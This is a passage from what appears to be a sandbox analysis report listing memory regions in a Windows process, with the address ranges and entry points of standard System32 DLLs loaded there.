"\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 659 start_va = 0x7fef8ca0000 end_va = 0x7fef8d10fff monitored = 0 entry_point = 0x7fef8ce51d0 region_type = mapped_file name = "wbemess.dll" filename = "\\Windows\\System32\\wbem\\wbemess.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemess.dll") Region: id = 660 start_va = 0x7fef8d20000 end_va = 0x7fef8d31fff monitored = 0 entry_point = 0x7fef8d289d0 region_type = mapped_file name = "ncobjapi.dll" filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll") Region: id = 661 start_va = 0x7fef8d40000 end_va = 0x7fef8df4fff monitored = 0 entry_point = 0x7fef8dbcf80 region_type = mapped_file name = "wmiprvsd.dll" filename = "\\Windows\\System32\\wbem\\WmiPrvSD.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiprvsd.dll") Region: id = 662 start_va = 0x7fef8e00000 end_va = 0x7fef8e18fff monitored = 0 entry_point = 0x7fef8e01104 region_type = mapped_file name = "resutils.dll" filename = "\\Windows\\System32\\resutils.dll" (normalized: "c:\\windows\\system32\\resutils.dll") Region: id = 663 start_va = 0x7fef8e20000 end_va = 0x7fef8e6ffff monitored = 0 entry_point = 0x7fef8e21190 region_type = mapped_file name = "clusapi.dll" filename = "\\Windows\\System32\\clusapi.dll" (normalized: "c:\\windows\\system32\\clusapi.dll") Region: id = 664 start_va = 0x7fef8e70000 end_va = 0x7fef8e77fff monitored = 0 entry_point = 0x7fef8e71020 region_type = mapped_file name = "sscore.dll" filename = "\\Windows\\System32\\sscore.dll" (normalized: "c:\\windows\\system32\\sscore.dll") Region: id = 665 start_va = 0x7fef8e80000 end_va = 0x7fef8ed9fff monitored = 0 entry_point = 0x7fef8ebdde0 region_type = mapped_file name = "repdrvfs.dll" filename = "\\Windows\\System32\\wbem\\repdrvfs.dll" (normalized: "c:\\windows\\system32\\wbem\\repdrvfs.dll") Region: id = 666 start_va = 0x7fef8ee0000 end_va = 0x7fef8f00fff monitored = 0 entry_point = 0x7fef8ef03b0 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll") Region: id = 667 start_va = 0x7fef8f10000 end_va = 0x7fef8f83fff monitored = 0 entry_point = 0x7fef8f166f0 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 668 start_va = 0x7fef8f90000 end_va = 0x7fef8ffafff monitored = 0 entry_point = 0x7fef8fd4344 region_type = mapped_file name = "hnetcfg.dll" filename = "\\Windows\\System32\\hnetcfg.dll" (normalized: "c:\\windows\\system32\\hnetcfg.dll") Region: id = 669 start_va = 0x7fef9000000 end_va = 0x7fef9012fff monitored = 0 entry_point = 0x7fef9001d80 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 670 start_va = 0x7fef9020000 end_va = 0x7fef9081fff monitored = 0 entry_point = 0x7fef905bd80 region_type = mapped_file name = "esscli.dll" filename = "\\Windows\\System32\\wbem\\esscli.dll" (normalized: "c:\\windows\\system32\\wbem\\esscli.dll") Region: id = 671 start_va = 0x7fef9090000 end_va = 0x7fef91bbfff monitored = 0 entry_point = 0x7fef9140ef0 region_type = mapped_file name = "wbemcore.dll" filename = "\\Windows\\System32\\wbem\\wbemcore.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemcore.dll") Region: id = 672 start_va = 0x7fef91c0000 end_va = 0x7fef91d9fff monitored = 0 entry_point = 0x7fef91d3fbc region_type = mapped_file name = "nci.dll" filename = "\\Windows\\System32\\nci.dll" (normalized: "c:\\windows\\system32\\nci.dll") Region: id = 673 start_va = 0x7fef91e0000 end_va = 0x7fef9263fff monitored = 0 entry_point = 0x7fef9231118 region_type = mapped_file name = "netcfgx.dll" filename = "\\Windows\\System32\\netcfgx.dll" (normalized: "c:\\windows\\system32\\netcfgx.dll") Region: id = 674 start_va = 0x7fef9270000 end_va = 0x7fef9294fff monitored = 0 entry_point = 0x7fef9288c54 region_type = mapped_file name = "browser.dll" filename = "\\Windows\\System32\\browser.dll" (normalized: "c:\\windows\\system32\\browser.dll") Region: id = 675 start_va = 0x7fef92a0000 end_va = 0x7fef92dcfff monitored = 0 entry_point = 0x7fef92a1070 region_type = mapped_file name = "srvsvc.dll" filename = "\\Windows\\System32\\srvsvc.dll" (normalized: "c:\\windows\\system32\\srvsvc.dll") Region: id = 676 start_va = 0x7fef92e0000 end_va = 0x7fef92edfff monitored = 0 entry_point = 0x7fef92e5500 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 677 start_va = 0x7fef92f0000 end_va = 0x7fef9316fff monitored = 0 entry_point = 0x7fef92f11a0 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 678 start_va = 0x7fef9320000 end_va = 0x7fef93f2fff monitored = 0 entry_point = 0x7fef9398b00 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 679 start_va = 0x7fef9440000 end_va = 0x7fef9486fff monitored = 0 entry_point = 0x7fef9441040 region_type = mapped_file name = "wdscore.dll" filename = "\\Windows\\System32\\wdscore.dll" (normalized: "c:\\windows\\system32\\wdscore.dll") Region: id = 680 start_va = 0x7fef9490000 end_va = 0x7fef94d1fff monitored = 0 entry_point = 0x7fef94917e4 region_type = mapped_file name = "sqmapi.dll" filename = "\\Windows\\System32\\sqmapi.dll" (normalized: "c:\\windows\\system32\\sqmapi.dll") Region: id = 681 start_va = 0x7fef94e0000 end_va = 0x7fef9571fff monitored = 0 entry_point = 0x7fef95551ec region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 682 start_va = 0x7fef9580000 end_va = 0x7fef95f6fff monitored = 0 entry_point = 0x7fef95be7f0 region_type = mapped_file name = "wbemcomn2.dll" filename = "\\Windows\\System32\\wbemcomn2.dll" (normalized: "c:\\windows\\system32\\wbemcomn2.dll") Region: id = 683 start_va = 0x7fef9600000 end_va = 0x7fef9639fff monitored = 0 entry_point = 0x7fef961d020 region_type = mapped_file name = "wmisvc.dll" filename = "\\Windows\\System32\\wbem\\WMIsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wmisvc.dll") Region: id = 684 start_va = 0x7fef96d0000 end_va = 0x7fef96defff monitored = 0 entry_point = 0x7fef96d9a48 region_type = mapped_file name = "mspatcha.dll" filename = "\\Windows\\System32\\mspatcha.dll" (normalized: "c:\\windows\\system32\\mspatcha.dll") Region: id = 685 start_va = 0x7fef9750000 end_va = 0x7fef976afff monitored = 0 entry_point = 0x7fef9751198 region_type = mapped_file name = "cabinet.dll" filename = "\\Windows\\System32\\cabinet.dll" (normalized: "c:\\windows\\system32\\cabinet.dll") Region: id = 686 start_va = 0x7fef97b0000 end_va = 0x7fef97f4fff monitored = 0 entry_point = 0x7fef97e3644 region_type = mapped_file name = "upnp.dll" filename = "\\Windows\\System32\\upnp.dll" (normalized: "c:\\windows\\system32\\upnp.dll") Region: id = 687 start_va = 0x7fef9800000 end_va = 0x7fef9811fff monitored = 0 entry_point = 0x7fef98090bc region_type = mapped_file name = "bitsigd.dll" filename = "\\Windows\\System32\\bitsigd.dll" (normalized: "c:\\windows\\system32\\bitsigd.dll") Region: id = 688 start_va = 0x7fef9910000 end_va = 0x7fef9920fff monitored = 0 entry_point = 0x7fef9919e7c region_type = mapped_file name = "ssdpapi.dll" filename = "\\Windows\\System32\\ssdpapi.dll" (normalized: "c:\\windows\\system32\\ssdpapi.dll") Region: id = 689 start_va = 0x7fef9930000 end_va = 0x7fef9993fff monitored = 0 entry_point = 0x7fef9931254 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 690 start_va = 0x7fef99a0000 end_va = 0x7fef9a10fff monitored = 0 entry_point = 0x7fef99a1010 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 691 start_va = 0x7fef9ab0000 end_va = 0x7fef9ac6fff monitored = 0 entry_point = 0x7fef9ab1060 region_type = mapped_file name = "vsstrace.dll" filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll") Region: id = 692 start_va = 0x7fef9ad0000 end_va = 0x7fef9c7ffff monitored = 0 entry_point = 0x7fef9ad1010 region_type = mapped_file name = "vssapi.dll" filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll") Region: id = 693 start_va = 0x7fef9f40000 end_va = 0x7fef9f48fff monitored = 0 entry_point = 0x7fef9f411a0 region_type = mapped_file name = "tschannel.dll" filename = "\\Windows\\System32\\TSChannel.dll" (normalized: "c:\\windows\\system32\\tschannel.dll") Region: id = 694 start_va = 0x7fefa170000 end_va = 0x7fefa1e6fff monitored = 0 entry_point = 0x7fefa17afd0 region_type = mapped_file name = "taskcomp.dll" filename = "\\Windows\\System32\\taskcomp.dll" (normalized: "c:\\windows\\system32\\taskcomp.dll") Region: id = 695 start_va = 0x7fefa290000 end_va = 0x7fefa299fff monitored = 0 entry_point = 0x7fefa29260c region_type = mapped_file name = "ktmw32.dll" filename = "\\Windows\\System32\\ktmw32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll") Region: id = 696 start_va = 0x7fefa2a0000 end_va = 0x7fefa3b1fff monitored = 0 entry_point = 0x7fefa2bf354 region_type = mapped_file name = "schedsvc.dll" filename = "\\Windows\\System32\\schedsvc.dll" (normalized: "c:\\windows\\system32\\schedsvc.dll") Region: id = 697 start_va = 0x7fefa3c0000 end_va = 0x7fefa3cefff monitored = 0 entry_point = 0x7fefa3c7e80 region_type = mapped_file name = "wiarpc.dll" filename = "\\Windows\\System32\\wiarpc.dll" (normalized: "c:\\windows\\system32\\wiarpc.dll") Region: id = 698 start_va = 0x7fefa3d0000 end_va = 0x7fefa3d8fff monitored = 0 entry_point = 0x7fefa3d3668 region_type = mapped_file name = "fvecerts.dll" filename = "\\Windows\\System32\\fvecerts.dll" (normalized: "c:\\windows\\system32\\fvecerts.dll") Region: id = 699 start_va = 0x7fefa3e0000 end_va = 0x7fefa3e8fff monitored = 0 entry_point = 0x7fefa3e1020 region_type = mapped_file name = "tbs.dll" filename = "\\Windows\\System32\\tbs.dll" (normalized: "c:\\windows\\system32\\tbs.dll") Region: id = 700 start_va = 0x7fefa3f0000 end_va = 0x7fefa445fff monitored = 0 entry_point = 0x7fefa3f1040 region_type = mapped_file name = "fveapi.dll" filename = "\\Windows\\System32\\fveapi.dll" (normalized: "c:\\windows\\system32\\fveapi.dll") Region: id = 701 start_va = 0x7fefa450000 end_va = 0x7fefa4adfff monitored = 0 entry_point = 0x7fefa459024 region_type = mapped_file name = "shsvcs.dll" filename = "\\Windows\\System32\\shsvcs.dll" (normalized: "c:\\windows\\system32\\shsvcs.dll") Region: id = 702 start_va = 0x7fefa4b0000 end_va = 0x7fefa4c7fff monitored = 0 entry_point = 0x7fefa4b1bf8 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 703 start_va = 0x7fefa4d0000 end_va = 0x7fefa4e0fff monitored = 0 entry_point = 0x7fefa4d16ac region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 704 start_va = 0x7fefa520000 end_va = 0x7fefa572fff monitored = 0 entry_point = 0x7fefa522b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 705 start_va = 0x7fefa730000 end_va = 0x7fefa73afff monitored = 0 entry_point = 0x7fefa731198 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 706 start_va = 0x7fefa740000 end_va = 0x7fefa766fff monitored = 0 entry_point = 0x7fefa7498bc region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 707 start_va = 0x7fefa770000 end_va = 0x7fefa783fff monitored = 0 entry_point = 0x7fefa773e64 region_type = mapped_file name = "sens.dll" filename = "\\Windows\\System32\\Sens.dll" (normalized: "c:\\windows\\system32\\sens.dll") Region: id = 708 start_va = 0x7fefa7a0000 end_va = 0x7fefa806fff monitored = 0 entry_point = 0x7fefa7b6060 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 709 start_va = 0x7fefa810000 end_va = 0x7fefa81afff monitored = 0 entry_point = 0x7fefa814f8c region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 710 start_va = 0x7fefa820000 end_va = 0x7fefa82bfff monitored = 0 entry_point = 0x7fefa8215d8 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 711 start_va = 0x7fefa830000 end_va = 0x7fefa83ffff monitored = 0 entry_point = 0x7fefa83835c region_type = mapped_file name = "themeservice.dll" filename = "\\Windows\\System32\\themeservice.dll" (normalized: "c:\\windows\\system32\\themeservice.dll") Region: id = 712 start_va = 0x7fefa840000 end_va = 0x7fefa858fff monitored = 0 entry_point = 0x7fefa8411a8 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 713 start_va = 0x7fefa860000 end_va = 0x7fefa896fff monitored = 0 entry_point = 0x7fefa868424 region_type = mapped_file name = "profsvc.dll" filename = "\\Windows\\System32\\profsvc.dll" (normalized: "c:\\windows\\system32\\profsvc.dll") Region: id = 714 start_va = 0x7fefa8e0000 end_va = 0x7fefa8f4fff monitored = 0 entry_point = 0x7fefa8e60d8 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 715 start_va = 0x7fefa900000 end_va = 0x7fefa9c1fff monitored = 0 entry_point = 0x7fefa90101c region_type = mapped_file name = "gpsvc.dll" filename = "\\Windows\\System32\\gpsvc.dll" (normalized: "c:\\windows\\system32\\gpsvc.dll") Region: id = 716 start_va = 0x7fefabe0000 end_va = 0x7fefabf6fff monitored = 0 entry_point = 0x7fefabe9d50 region_type = mapped_file name = "ncprov.dll" filename = "\\Windows\\System32\\wbem\\NCProv.dll" (normalized: "c:\\windows\\system32\\wbem\\ncprov.dll") Region: id = 717 start_va = 0x7fefac00000 end_va = 0x7fefac08fff monitored = 0 entry_point = 0x7fefac01010 region_type = mapped_file name = "avrt.dll" filename = "\\Windows\\System32\\avrt.dll" (normalized: "c:\\windows\\system32\\avrt.dll") Region: id = 718 start_va = 0x7fefacf0000 end_va = 0x7fefad1cfff monitored = 0 entry_point = 0x7fefacf1010 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 719 start_va = 0x7fefad20000 end_va = 0x7fefad30fff monitored = 0 entry_point = 0x7fefad214c0 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll") Region: id = 720 start_va = 0x7fefae70000 end_va = 0x7fefae83fff monitored = 0 entry_point = 0x7fefae716b4 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 721 start_va = 0x7fefae90000 end_va = 0x7fefaea4fff monitored = 0 entry_point = 0x7fefae91050 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 722 start_va = 0x7fefaeb0000 end_va = 0x7fefaebbfff monitored = 0 entry_point = 0x7fefaeb18a4 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 723 start_va = 0x7fefaec0000 end_va = 0x7fefaed5fff monitored = 0 entry_point = 0x7fefaec11a0 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 724 start_va = 0x7fefaff0000 end_va = 0x7fefb000fff monitored = 0 entry_point = 0x7fefaff1070 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 725 start_va = 0x7fefb150000 end_va = 0x7fefb184fff monitored = 0 entry_point = 0x7fefb151064 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 726 start_va = 0x7fefb5c0000 end_va = 0x7fefb615fff monitored = 0 entry_point = 0x7fefb5cbbc0 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 727 start_va = 0x7fefb620000 end_va = 0x7fefb74bfff monitored = 0 entry_point = 0x7fefb6294bc region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 728 start_va = 0x7fefb750000 end_va = 0x7fefb76cfff monitored = 0 entry_point = 0x7fefb751ef4 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 729 start_va = 0x7fefb7a0000 end_va = 0x7fefb993fff monitored = 0 entry_point = 0x7fefb92c924 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll") Region: id = 730 start_va = 0x7fefbe30000 end_va = 0x7fefbe3bfff monitored = 0 entry_point = 0x7fefbe31064 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 731 start_va = 0x7fefbe40000 end_va = 0x7fefbefafff monitored = 0 entry_point = 0x7fefbe46de0 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll") Region: id = 732 start_va = 0x7fefbf00000 end_va = 0x7fefbf06fff monitored = 0 entry_point = 0x7fefbf014b0 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 733 start_va = 0x7fefbff0000 end_va = 0x7fefc00afff monitored = 0 entry_point = 0x7fefbff2068 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 734 start_va = 0x7fefc010000 end_va = 0x7fefc02dfff monitored = 0 entry_point = 0x7fefc0113b8 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 735 start_va = 0x7fefc030000 end_va = 0x7fefc041fff monitored = 0 entry_point = 0x7fefc031060 region_type = mapped_file name = "devrtl.dll" filename = "\\Windows\\System32\\devrtl.dll" (normalized: "c:\\windows\\system32\\devrtl.dll") Region: id = 736 start_va = 0x7fefc050000 end_va = 0x7fefc06efff monitored = 0 entry_point = 0x7fefc055c68 region_type = mapped_file name = "spinf.dll" filename = "\\Windows\\System32\\SPInf.dll" (normalized: "c:\\windows\\system32\\spinf.dll") Region: id = 737 start_va = 0x7fefc120000 end_va = 0x7fefc158fff monitored = 0 entry_point = 0x7fefc12c0f0 region_type = mapped_file name = "ubpm.dll" filename = "\\Windows\\System32\\ubpm.dll" (normalized: "c:\\windows\\system32\\ubpm.dll") Region: id = 738 start_va = 0x7fefc160000 end_va = 0x7fefc169fff monitored = 0 entry_point = 0x7fefc163cb8 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 739 start_va = 0x7fefc170000 end_va = 0x7fefc17cfff monitored = 0 entry_point = 0x7fefc171348 region_type = mapped_file name = "pcwum.dll" filename = "\\Windows\\System32\\pcwum.dll" (normalized: "c:\\windows\\system32\\pcwum.dll") Region: id = 740 start_va = 0x7fefc260000 end_va = 0x7fefc2a6fff monitored = 0 entry_point = 0x7fefc261064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 741 start_va = 0x7fefc350000 end_va = 0x7fefc37ffff monitored = 0 entry_point = 0x7fefc35194c region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 742 start_va = 0x7fefc380000 end_va = 0x7fefc3dafff monitored = 0 entry_point = 0x7fefc386940 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 743 start_va = 0x7fefc4f0000 end_va = 0x7fefc4f6fff monitored = 0 entry_point = 0x7fefc4f142c region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 744 start_va = 0x7fefc500000 end_va = 0x7fefc554fff monitored = 0 entry_point = 0x7fefc501054 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 745 start_va = 0x7fefc560000 end_va = 0x7fefc577fff monitored = 0 entry_point = 0x7fefc563b48 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 746 start_va = 0x7fefc670000 end_va = 0x7fefc6a1fff monitored = 0 entry_point = 0x7fefc67144c region_type = mapped_file name = "netjoin.dll" filename = "\\Windows\\System32\\netjoin.dll" (normalized: "c:\\windows\\system32\\netjoin.dll") Region: id = 747 start_va = 0x7fefc6b0000 end_va = 0x7fefc6b7fff monitored = 0 entry_point = 0x7fefc6b2a6c region_type = mapped_file name = "wmsgapi.dll" filename = "\\Windows\\System32\\wmsgapi.dll" (normalized: "c:\\windows\\system32\\wmsgapi.dll") Region: id = 748 start_va = 0x7fefc6c0000 end_va = 0x7fefc6c9fff monitored = 0 entry_point = 0x7fefc6c3b40 region_type = mapped_file name = "sysntfy.dll" filename = "\\Windows\\System32\\sysntfy.dll" (normalized: "c:\\windows\\system32\\sysntfy.dll") Region: id = 749 start_va = 0x7fefc6d0000 end_va = 0x7fefc6f1fff monitored = 0 entry_point = 0x7fefc6d5d30 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 750 start_va = 0x7fefc750000 end_va = 0x7fefc77efff monitored = 0 entry_point = 0x7fefc751064 region_type = mapped_file name = "authz.dll" filename = "\\Windows\\System32\\authz.dll" (normalized: "c:\\windows\\system32\\authz.dll") Region: id = 751 start_va = 0x7fefc790000 end_va = 0x7fefc7fcfff monitored = 0 entry_point = 0x7fefc791010 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 752 start_va = 0x7fefc800000 end_va = 0x7fefc813fff monitored = 0 entry_point = 0x7fefc804160 region_type = mapped_file name = "cryptdll.dll" filename = "\\Windows\\System32\\cryptdll.dll" (normalized: "c:\\windows\\system32\\cryptdll.dll") Region: id = 753 start_va = 0x7fefca60000 end_va = 0x7fefca82fff monitored = 0 entry_point = 0x7fefca61198 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 754 start_va = 0x7fefcb00000 end_va = 0x7fefcb0afff monitored = 0 entry_point = 0x7fefcb01030 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 755 start_va = 0x7fefcb30000 end_va = 0x7fefcb54fff monitored = 0 entry_point = 0x7fefcb39658 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 756 start_va = 0x7fefcb60000 end_va = 0x7fefcb6efff monitored = 0 entry_point = 0x7fefcb61010 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 757 start_va = 0x7fefcb70000 end_va = 0x7fefcc00fff monitored = 0 entry_point = 0x7fefcb71440 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 758 start_va = 0x7fefcc10000 end_va = 0x7fefcc4cfff monitored = 0 entry_point = 0x7fefcc118f4 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 759 start_va = 0x7fefcc50000 end_va = 0x7fefcc63fff monitored = 0 entry_point = 0x7fefcc510e0 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 760 start_va = 0x7fefcc70000 end_va = 0x7fefcc7efff monitored = 0 entry_point = 0x7fefcc719b0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 761 start_va = 0x7fefcd10000 end_va = 0x7fefcd1efff monitored = 0 entry_point = 0x7fefcd11020 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 762 start_va = 0x7fefcd20000 end_va = 0x7fefcd8bfff monitored = 0 entry_point = 0x7fefcd22780 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 763 start_va = 0x7fefcd90000 end_va = 0x7fefcefcfff monitored = 0 entry_point = 0x7fefcd910b4 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 764 start_va = 0x7fefcf00000 end_va = 0x7fefcf35fff monitored = 0 entry_point = 0x7fefcf01474 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 765 start_va = 0x7fefcf40000 end_va = 0x7fefcf59fff monitored = 0 entry_point = 0x7fefcf41558 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 766 start_va = 0x7fefd000000 end_va = 0x7fefd03afff monitored = 0 entry_point = 0x7fefd001324 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 767 start_va = 0x7fefd420000 end_va = 0x7fefd486fff monitored = 0 entry_point = 0x7fefd42b03c region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 768 start_va = 0x7fefd490000 end_va = 0x7fefd4dcfff monitored = 0 entry_point = 0x7fefd491070 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 769 start_va = 0x7fefd4e0000 end_va = 0x7fefd6e2fff monitored = 0 entry_point = 0x7fefd503330 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 770 start_va = 0x7fefd6f0000 end_va = 0x7fefe477fff monitored = 0 entry_point = 0x7fefd76cebc region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 771 start_va = 0x7fefe480000 end_va = 0x7fefe656fff monitored = 0 entry_point = 0x7fefe481010 region_type = mapped_file name 